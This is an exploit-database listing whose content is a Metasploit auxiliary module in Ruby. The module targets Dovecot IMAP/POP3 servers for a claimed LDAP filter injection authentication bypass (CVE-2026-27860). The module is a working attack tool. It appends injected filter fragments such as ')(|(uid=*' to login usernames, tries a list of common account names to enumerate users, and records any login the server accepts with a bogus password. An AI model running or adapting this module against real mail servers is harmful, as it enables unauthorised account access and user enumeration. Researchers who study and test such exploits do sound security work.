## https://sploitus.com/exploit?id=PACKETSTORM:219545
==================================================================================================================================
    | # Title     : Dovecot 3.1.0 LDAP Injection Authentication Bypass                                                               |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : https://www.dovecotpro.com/                                                                                      |
    ==================================================================================================================================
    
    [+] Summary    : This Metasploit auxiliary module probes Dovecot IMAP/POP3 services for an LDAP filter injection through the login username, which the advisory claims can lead to authentication bypass or user enumeration. The check is heuristic: it sends a bogus password and can only claim a bypass when the server actually accepts the login; LDAP-related wording in a rejected-login reply is at most a hint, not proof, and a server that refuses plaintext LOGIN (PRIVACYREQUIRED/LOGINDISABLED) leaves the result inconclusive.
    
    
    [+] POC        :  
    
    ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
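    class MetasploitModule < Msf::Auxiliary
      include Msf::Auxiliary::Report
      include Msf::Exploit::Remote::Tcp
      include Msf::Auxiliary::Scanner

      # Account names probed when USERNAME is left empty.
      COMMON_USERS = %w[admin root postmaster webmaster test user].freeze

      # Tag of the single IMAP LOGIN command sent per connection.
      IMAP_TAG = 'a1'.freeze

      # Bogus password used for every probe. A bypass is only claimed when the
      # server accepts a login carrying this password.
      PROBE_PASSWORD = 'test'.freeze

      # Upper bound on get_once reads while waiting for the tagged IMAP reply,
      # so a chatty or stalled server cannot hang a probe forever.
      MAX_READS = 8

      def initialize(info = {})
        super(
          update_info(
            info,
            'Name' => 'Dovecot LDAP Injection Authentication Bypass',
            'Description' => %q{
              Probes an IMAP or POP3 service for LDAP filter injection through the
              login username. With USERNAME empty, a short list of common account
              names is tried with an injected filter fragment appended; with
              USERNAME set, LDAP_FILTER (or a default wildcard fragment) is
              appended to that name. A finding is recorded only when the server
              accepts the login with a bogus password. A control login with a
              random name is sent first: if that is accepted too, the host accepts
              arbitrary credentials and is skipped rather than reported.
            },
            'Author' => [
              'indoushka'
            ],
            'References' => [
              ['CVE', '2026-27860']
            ],
            'License' => MSF_LICENSE,
            'DisclosureDate' => '2026-03-27'
          )
        )

        register_options([
          Opt::RPORT(143),
          OptString.new('USERNAME', [false, 'Username', '']),
          OptString.new('LDAP_FILTER', [false, 'LDAP filter', '']),
          OptEnum.new('PROTOCOL', [true, 'Protocol', 'IMAP', ['IMAP', 'POP3']])
        ])
      end

      # Scanner entry point, invoked once per target host.
      #
      # A control login with a random username and the bogus password must be
      # rejected before any injection probe is trusted; otherwise a server (or
      # honeypot) that accepts anything would be reported as vulnerable.
      def run_host(ip)
        print_status("Dovecot LDAP Injection CVE-2026-27860")
        print_status("Target: #{ip}:#{rport}")

        control = Rex::Text.rand_text_alpha(10)
        if test_auth(control)
          print_warning("Control login '#{control}' with a bogus password was accepted; injection results would be meaningless, skipping host")
          return
        end

        if datastore['USERNAME'].to_s.strip.empty?
          enumerate_users
        else
          test_ldap_injection
        end
      end

      # Tries each common account name with a filter fragment appended and
      # reports the name only when the server accepts that login.
      def enumerate_users
        print_status("Enumerating users...")

        COMMON_USERS.each do |user|
          payload = "#{user})(|(uid=*"
          vprint_status("Testing: #{user}")

          if test_auth(payload)
            print_good("User found: #{user}")
            report_user(user)
          end

          # Small pause so repeated failed logins are not fired back-to-back.
          sleep(0.5)
        end
      end

      # Appends LDAP_FILTER (or a default wildcard fragment) to USERNAME and
      # reports a finding only if the server accepts the resulting login.
      def test_ldap_injection
        username = datastore['USERNAME']
        ldap_payload = datastore['LDAP_FILTER'].to_s.empty? ? "*)(uid=*" : datastore['LDAP_FILTER']
        test_username = "#{username})(#{ldap_payload}"

        print_status("Testing injection: #{test_username}")

        if test_auth(test_username)
          print_good("LDAP injection possible for: #{username}")
          # Record the payload actually sent, not the (possibly empty) option.
          report_ldap_vulnerability(ldap_payload)
        else
          print_error("No LDAP injection detected")
        end
      end

      # Opens one connection and attempts a single login with +username+ and
      # PROBE_PASSWORD.
      #
      # @return [Boolean] true only when the server reports the login as
      #   successful (IMAP tagged OK, or POP3 +OK after PASS). Rejected logins,
      #   protocol oddities and network errors all yield false.
      def test_auth(username)
        sock = nil
        accepted = false

        begin
          sock = connect
          banner = sock.get_once
          vprint_status("Banner: #{banner}")

          accepted = if datastore['PROTOCOL'] == 'IMAP'
                       imap_login_accepted?(sock, username)
                     else
                       pop3_login_accepted?(sock, username)
                     end
        rescue => e
          vprint_error("Error: #{e.message}")
        ensure
          disconnect(sock) if sock
        end

        accepted
      end

      def report_user(username)
        report_note(
          host: rhost,
          port: rport,
          type: 'dovecot.ldap.user',
          data: { username: username }
        )
      end

      # Records the injection finding. +payload+ defaults to the LDAP_FILTER
      # option for callers that do not pass the fragment actually sent.
      def report_ldap_vulnerability(payload = datastore['LDAP_FILTER'])
        report_note(
          host: rhost,
          port: rport,
          type: 'dovecot.ldap.injection',
          data: {
            vulnerable: true,
            payload: payload
          }
        )
      end

      private

      # Sends "a1 LOGIN" and returns true only on a tagged "a1 OK".
      #
      # Dovecot answers every failed login with "a1 NO ...", so matching "NO"
      # (or any substring of an error text) would flag every target. A NO
      # carrying PRIVACYREQUIRED or LOGINDISABLED means plaintext LOGIN is
      # refused on this port and the probe is inconclusive, not negative.
      def imap_login_accepted?(sock, username)
        if username.match?(/[\r\n]/)
          vprint_error("Username contains CR/LF, which cannot be sent inside an IMAP quoted string")
          return false
        end

        # '"' and '\' are the only characters special inside an IMAP quoted
        # string; escape them so a filter containing either does not break
        # the command.
        quoted = username.gsub(/["\\]/) { |c| "\\#{c}" }
        sock.put("#{IMAP_TAG} LOGIN \"#{quoted}\" \"#{PROBE_PASSWORD}\"\r\n")

        response = read_tagged_response(sock, IMAP_TAG)
        vprint_status("Response: #{response}")
        return false unless response

        tagged = response.lines.find { |line| line.start_with?("#{IMAP_TAG} ") }
        return false unless tagged

        if tagged.match?(/PRIVACYREQUIRED|LOGINDISABLED/)
          vprint_status("Plaintext LOGIN is disabled on this port; result inconclusive (try the TLS port)")
          return false
        end

        # LDAP/search wording in a rejection is surfaced as a hint only; it is
        # not evidence that the login was accepted.
        if tagged.match?(/LDAP|search/)
          vprint_status("Server reply mentions LDAP/search; the filter may be reaching the directory")
        end

        tagged.start_with?("#{IMAP_TAG} OK")
      end

      # USER/PASS exchange; true only when PASS itself is answered with +OK.
      def pop3_login_accepted?(sock, username)
        if username.match?(/[\r\n]/)
          vprint_error("Username contains CR/LF, which cannot be sent in a POP3 command")
          return false
        end

        sock.put("USER #{username}\r\n")
        response = sock.get_once
        vprint_status("USER response: #{response}")
        return false unless response && response.start_with?('+OK')

        sock.put("PASS #{PROBE_PASSWORD}\r\n")
        final = sock.get_once
        vprint_status("PASS response: #{final}")
        !!(final && final.start_with?('+OK'))
      end

      # Accumulates get_once reads until a line starting with +tag+ arrives or
      # MAX_READS reads have been made. Returns nil when nothing was read.
      def read_tagged_response(sock, tag)
        buf = String.new
        MAX_READS.times do
          chunk = sock.get_once
          break if chunk.nil?

          buf << chunk
          break if buf.lines.any? { |line| line.start_with?("#{tag} ") }
        end
        buf.empty? ? nil : buf
      end
    end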
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================